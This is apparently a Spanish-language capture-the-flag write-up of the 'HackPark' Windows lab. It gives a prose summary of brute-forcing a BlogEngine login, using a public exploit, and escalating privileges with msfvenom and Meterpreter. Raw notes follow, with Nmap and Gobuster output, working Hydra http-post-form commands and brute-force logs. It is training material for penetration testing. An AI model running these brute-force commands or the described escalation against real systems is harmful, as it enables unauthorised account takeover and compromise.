Force bruta el inicio de sesión de un sitio web con Hydra, identifique y utilice un exploit público y luego aumente sus privilegios en esta máquina con Windows
Aquí está cómo lo hice:
1. Implementar la máquina vulnerable:
Empecé implementando la máquina virtual. Nada emocionante, solo asegurándome de tener mi entorno de prueba listo.
2. Usar Hydra para forzar un inicio de sesión:
Primero, escaneé la máquina con Nmap para encontrar los servicios en ejecución.
Luego, usé Gobuster para buscar posibles rutas o archivos en el servidor web.
Intercepté las solicitudes HTTP con Burp Proxy para entender cómo funciona el formulario de inicio de sesión.
Descubrí que el formulario usaba una solicitud POST, lo cual es clave.
Intenté una fuerza bruta con Hydra usando varios usuarios predeterminados e investigando, dando qeu el usuario era admin, solo aplique fuerza bruta sobr el password con hydra usando el diccionario Rockyou.txt, y bingo encontarmos el Passwd.
3. Comprometer la máquina:
Descubrí que el sitio web estaba utilizando BlogEngine. Busqué exploits usando searchsploit y en exploit DB.
Encontré un exploit y lo usé para obtener acceso inicial. Bingo, ya estaba dentro.
Luego usé Meterpreter para explorar la máquina, encontré la versión del sistema operativo y un servicio anormal.
4. Escalada de privilegios de Windows:
Generé un shell inverso con msfvenom para tener más control para lograr una sesion de meterpreter escuchando con multi handler de metasploit.
Descargué y ejecuté la carga útil en la máquina de destino usando el primer shell qeu conseguimos.
Con Meterpreter, obtuve información sobre el sistema y encontré un servicio anormal ejecutándose cada 30 segundos, se complico la ejecucion el binario por qeu no se me ejecutaba solo, pero pude escalas privilegios de system utilizando el comando especial de meterpreter para escalada de privilegios automatizada la cual me dijo mqeu uso el metodo 5 y se tenzo estabamos con privilegios de System, pero luego lo mismo ejecute mi binario creado con msfvenom y ejecute ahoar si el archivo del servicio recibiendo la shell en netcat como system.
Reemplacé el binario del servicio anormal con mi propia carga útil de shell inverso.
Conecté un controlador, ejecuté el exploit y se tenzo, tenía una sesión de Meterpreter con privilegios.
5. Escalada de privilegios sin Metasploit:
Cambié de una sesión de netcat inestable a un shell inverso más estable usando msfvenom.
Usé WinPeas para buscar vulnerabilidades y no pudo encontrar la informacion de instalacion del sistema qeu solicitaba, asi qeu con un comando la pude encontar y listo (luego vi en foros qeue muchos tuvieon este problema).
Conclusión:
Fue todo un viaje, explorando diferentes técnicas de hacking desde la fuerza bruta hasta la explotación de vulnerabilidades. Este resumen no te da las respuestas exactas, pero te da una idea de cómo abordé cada paso. ¡Buena suerte con tus propias aventuras de hacking!
Last updated
// Some code
PENTESTING OFFENSIVO:
HackPark:
¡Force bruta el inicio de sesión de un sitio web con Hydra, identifique y utilice un exploit público y luego aumente sus privilegios en esta máquina con Windows!
ANALISIS DE LA PAGINA WEB:
http://10.10.174.239/Account/login.aspx?ReturnURL=%2fADMIN
<!--- BlogEngine 3.3.6.0 -->
<form method="post" action="login.aspx?ReturnURL=%2fADMIN" id="Form1">
<div class="aspNetHidden">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="dafpnMH9+6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2/X3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP">
</div>
<div class="aspNetHidden">
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="Tjy94c85ufC73iZyte/PDZ1wB3D/bqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN+woqOKdG3MY4wFOYEKmxK0llq5tR+foH/aDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t">
</div>
<div class="account">
<div class="account-header text-center">
<a href="https://blogengine.io/" target="_blank">
<img alt="BlogEngine.NET" src="../Content/images/blog/logo.png"></a>
</div>
<div id="StatusBox">
<div id="AdminStatus" style="display: none"></div>
</div>
<div class="account-box">
<h1 class="account-title">
<span id="lblTitle">Iniciar sesión</span>
</h1>
<div class="account-body">
<div class="form-group">
<label>Username</label>
<input name="ctl00$MainContent$LoginUser$UserName" type="text" id="UserName" class="textEntry ltr-dir">
</div>
<div class="form-group">
<label>Password</label>
<input name="ctl00$MainContent$LoginUser$Password" type="password" id="Password" class="passwordEntry ltr-dir">
</div>
<div class="form-group with-icon">
<span class="icon-form-group">
<input id="RememberMe" type="checkbox" name="ctl00$MainContent$LoginUser$RememberMe"></span>
<label for="RememberMe" id="RememberMeLabel" class="label-title ">Mantenerme autenticado</label>
</div>
<input type="submit" name="ctl00$MainContent$LoginUser$LoginButton" value="Iniciar sesión" onclick="return ValidateLogin();" id="LoginButton" class="btn btn-success btn-block btn-lg">
<div class="small-link ">
<a id="linkForgotPassword" class="text-muted" href="/Account/password-retrieval.aspx">¿Olvidó su contraseña?</a>
</div>
</div>
<script type="text/javascript">
$(document).ready(function () {
$("input[name$='UserName']").focus();
});
</script>
</div>
</div>
</form>
VEMOS UN SERVICIO QUE IUTILIZA EL LOGIN:
<img alt="BlogEngine.NET" src="../Content/images/blog/logo.png">
ESACNEO NMAP:
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -O -Pn --script "vuln" 10.10.174.239
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-25 00:33 UTC
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Stats: 0:02:50 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 94.81% done; ETC: 00:36 (0:00:04 remaining)
Nmap scan report for ip-10-10-174-239.eu-west-1.compute.internal (10.10.174.239)
Host is up (0.00051s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=ip-10-10-174-239.eu-west-1.compute.internal
| Found the following possible CSRF vulnerabilities:
|
| Path: http://ip-10-10-174-239.eu-west-1.compute.internal:80/
| Form id: aspnetform
| Form action: /
|
| Path: http://ip-10-10-174-239.eu-west-1.compute.internal:80/author/Admin
| Form id: aspnetform
| Form action: /author/Admin
|
| Path: http://ip-10-10-174-239.eu-west-1.compute.internal:80/archive
| Form id: aspnetform
| Form action: /archive
|
| Path: http://ip-10-10-174-239.eu-west-1.compute.internal:80/post/welcome-to-hack-park
| Form id: aspnetform
| Form action: /post/welcome-to-hack-park
|
| Path: http://ip-10-10-174-239.eu-west-1.compute.internal:80/category/BlogEngineNET
| Form id: aspnetform
|_ Form action: /category/BlogEngineNET
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /calendar/cal_search.php: ExtCalendar
| /robots.txt: Robots file
| /calendar/cal_cat.php: Calendarix
| /archive/: Potentially interesting folder
| /archives/: Potentially interesting folder
| /author/: Potentially interesting folder
| /contact/: Potentially interesting folder
| /contacts/: Potentially interesting folder
| /search/: Potentially interesting folder
|_ /search-ui/: Potentially interesting folder
|_http-server-header: Microsoft-IIS/8.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:microsoft:internet_information_services:8.5:
|_ CVE-2014-4078 5.1 https://vulners.com/cve/CVE-2014-4078
3389/tcp open ssl/ms-wbt-server?
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 1024
| Public Key Length: 1024
| References:
|_ https://weakdh.org
MAC Address: 02:DA:32:DD:AC:71 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 214.52 seconds
BUSCA POSIBLES DIRECTORIOS DE RUTAS:
gobuster dir -u http://10.10.174.239/ -w /usr/share/wordlists/dirb/common.txt
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://10.10.174.239/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.174.239/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2024/01/25 00:51:10 Starting gobuster in directory enumeration mode
===============================================================
/account (Status: 301) [Size: 152] [--> http://10.10.174.239/account/]
/admin (Status: 302) [Size: 173] [--> http://10.10.174.239/Account/login.aspx?ReturnURL=/admin]
/Admin (Status: 302) [Size: 173] [--> http://10.10.174.239/Account/login.aspx?ReturnURL=/Admin]
/ADMIN (Status: 302) [Size: 173] [--> http://10.10.174.239/Account/login.aspx?ReturnURL=/ADMIN]
/Archive (Status: 200) [Size: 8325]
/archives (Status: 200) [Size: 8326]
/archive (Status: 200) [Size: 8325]
/aspnet_client (Status: 301) [Size: 158] [--> http://10.10.174.239/aspnet_client/]
/aux (Status: 500) [Size: 1763]
/Blog (Status: 500) [Size: 1208]
/blog (Status: 500) [Size: 1208]
/com1 (Status: 500) [Size: 1763]
/com2 (Status: 500) [Size: 1763]
/com3 (Status: 500) [Size: 1763]
/contact (Status: 200) [Size: 9935]
/Contact (Status: 200) [Size: 9935]
/contact_bean (Status: 200) [Size: 9940]
/contact_us (Status: 200) [Size: 9938]
/contact-form (Status: 200) [Size: 9940]
/contactinfo (Status: 200) [Size: 9939]
/contacts (Status: 200) [Size: 9936]
/contacto (Status: 200) [Size: 9936]
/contactus (Status: 200) [Size: 9937]
/ContactUs (Status: 200) [Size: 9937]
/contact-us (Status: 200) [Size: 9938]
/content (Status: 301) [Size: 152] [--> http://10.10.174.239/content/]
/Content (Status: 301) [Size: 152] [--> http://10.10.174.239/Content/]
/con (Status: 500) [Size: 1763]
/custom (Status: 301) [Size: 151] [--> http://10.10.174.239/custom/]
/Default (Status: 500) [Size: 1763]
/default_icon (Status: 500) [Size: 1763]
/default_image (Status: 500) [Size: 1763]
/defaults (Status: 500) [Size: 1763]
/default_pages (Status: 500) [Size: 1763]
/default_page (Status: 500) [Size: 1763]
/default_logo (Status: 500) [Size: 1763]
/default (Status: 500) [Size: 1763]
/fonts (Status: 301) [Size: 150] [--> http://10.10.174.239/fonts/]
/lpt2 (Status: 500) [Size: 1763]
/lpt1 (Status: 500) [Size: 1763]
/nul (Status: 500) [Size: 1763]
/prn (Status: 500) [Size: 1763]
/robots.txt (Status: 200) [Size: 303]
/Scripts (Status: 301) [Size: 152] [--> http://10.10.174.239/Scripts/]
/scripts (Status: 301) [Size: 152] [--> http://10.10.174.239/scripts/]
/search (Status: 200) [Size: 8407]
/Search (Status: 200) [Size: 8407]
/search_result (Status: 200) [Size: 8414]
/search_results (Status: 200) [Size: 8415]
/searchnx (Status: 200) [Size: 8409]
/search-results (Status: 200) [Size: 8415]
/searchurl (Status: 200) [Size: 8410]
/searchresults (Status: 200) [Size: 8414]
/setup (Status: 302) [Size: 175] [--> http://10.10.174.239/Account/login.aspx?ReturnUrl=%2fsetup]
Progress: 3851 / 4615 (83.45%)===============================================================
2024/01/25 00:51:13 Finished
===============================================================
PROBAMOS HACER FUERZA BRUTA AL FORMULARIO DEL LOGIN BURPSUITE:
PROBAMOS HACER FUERZA BRUTA AL FORMULARIO DEL LOGIN HYDRA:
http://10.10.174.239/Account/login.aspx?ReturnURL=%2fADMIN
hydra -l penywise -P /usr/share/wordlists/rokyou.txt 10.10.174.239 http-post-form -vV
hydra -l penywise -P /usr/share/wordlists/rokyou.txt http://10.10.174.239/Account/login.aspx?ReturnURL=/admin/ http-post-form -vV
hydra -l penywise -P /usr/share/wordlists/rokyou.txt 10.10.174.239 -V http-post-form '__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00%24MainContent%24LoginUser%24UserName=penywise&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n' -vV
/login.aspx?ReturnURL=%2fADMIN:
hydra -l penywise -P /usr/share/wordlists/rokyou.txt 10.10.174.239 -V http-post-form '/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00%24MainContent%24LoginUser%24UserName=penywise&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n' -vV
hydra -l penywise -P /usr/share/wordlists/rokyou.txt 10.10.174.239 -V http-post-form '/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00%24MainContent%24LoginUser%24UserName=penywise&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n' -vV
FUNCIONO SACAMOS LA SOLUICITUD DE LA URL + LO ENVIADO POR POST VISTO EN BURSUITE:
hydra -l penywise -P /usr/share/wordlists/rockyou.txt 10.10.174.239 -V http-post-form "/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00$MainContent$LoginUser$UserName=^USER^&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Iniciar+sesi%C3%B3n:Login failed"
TAMBIEN FUNCIONO:
hydra -l penywise -P /usr/share/wordlists/rockyou.txt 10.10.174.239 -V http-post-form "/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00$MainContent$LoginUser$UserName=penywise&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Iniciar+sesi%C3%B3n:Login failed"
FUNCIONO:
hydra -l penywise -P /usr/share/wordlists/rockyou.txt 10.10.174.239 -V http-post-form "/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=^VIEWSTATE^&__EVENTVALIDATION=^EVENTVALIDATION^&ctl00$MainContent$LoginUser$UserName=^USER^&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Iniciar+sesi%C3%B3n:Login failed"
┌──(root㉿kali)-[/usr/share/wordlists]
└─# hydra -l penywise -P /usr/share/wordlists/rockyou.txt 10.10.174.239 -V http-post-form "/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=^VIEWSTATE^&__EVENTVALIDATION=^EVENTVALIDATION^&ctl00$MainContent$LoginUser$UserName=^USER^&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Iniciar+sesi%C3%B3n:Login failed"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-25 01:33:32
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.174.239:80/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=^VIEWSTATE^&__EVENTVALIDATION=^EVENTVALIDATION^&ctl00=^USER^&ctl00=^PASS^&ctl00=Iniciar+sesi%C3%B3n:Login failed
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "princess" - 6 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "12345678" - 9 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "abc123" - 10 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "nicole" - 11 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "daniel" - 12 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "babygirl" - 13 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "monkey" - 14 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "lovely" - 15 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "jessica" - 16 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "654321" - 17 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "michael" - 18 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "ashley" - 19 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "qwerty" - 20 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "111111" - 21 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "iloveu" - 22 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "000000" - 23 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "michelle" - 24 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "tigger" - 25 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "sunshine" - 26 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "chocolate" - 27 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "password1" - 28 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "soccer" - 29 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "anthony" - 30 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "friends" - 31 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "butterfly" - 32 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "purple" - 33 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "angel" - 34 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "jordan" - 35 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "liverpool" - 36 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "justin" - 37 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "loveme" - 38 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "fuckyou" - 39 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "123123" - 40 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "football" - 41 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "secret" - 42 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "andrea" - 43 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "carlos" - 44 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "jennifer" - 45 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "joshua" - 46 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "bubbles" - 47 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "1234567890" - 48 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "superman" - 49 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "hannah" - 50 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "melissa" - 74 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "eminem" - 75 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "matthew" - 76 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "robert" - 77 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "danielle" - 78 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "forever" - 79 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "family" - 80 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "jonathan" - 81 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "987654321" - 82 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "computer" - 83 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "whatever" - 84 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "dragon" - 85 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "vanessa" - 86 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "cookie" - 87 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "naruto" - 88 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "summer" - 89 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "sweety" - 90 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "spongebob" - 91 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "joseph" - 92 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "junior" - 93 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "softball" - 94 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "taylor" - 95 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "yellow" - 96 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "daniela" - 97 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "lauren" - 98 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "mickey" - 99 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "princesa" - 100 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "alexandra" - 101 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "alexis" - 102 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "jesus" - 103 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "estrella" - 104 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "miguel" - 105 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "william" - 106 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "thomas" - 107 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "beautiful" - 108 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "mylove" - 109 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "angela" - 110 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "poohbear" - 111 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "patrick" - 112 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "iloveme" - 113 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "sakura" - 114 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "adrian" - 115 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "alexander" - 116 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "destiny" - 117 of 14344399 [child 3] (0/0)
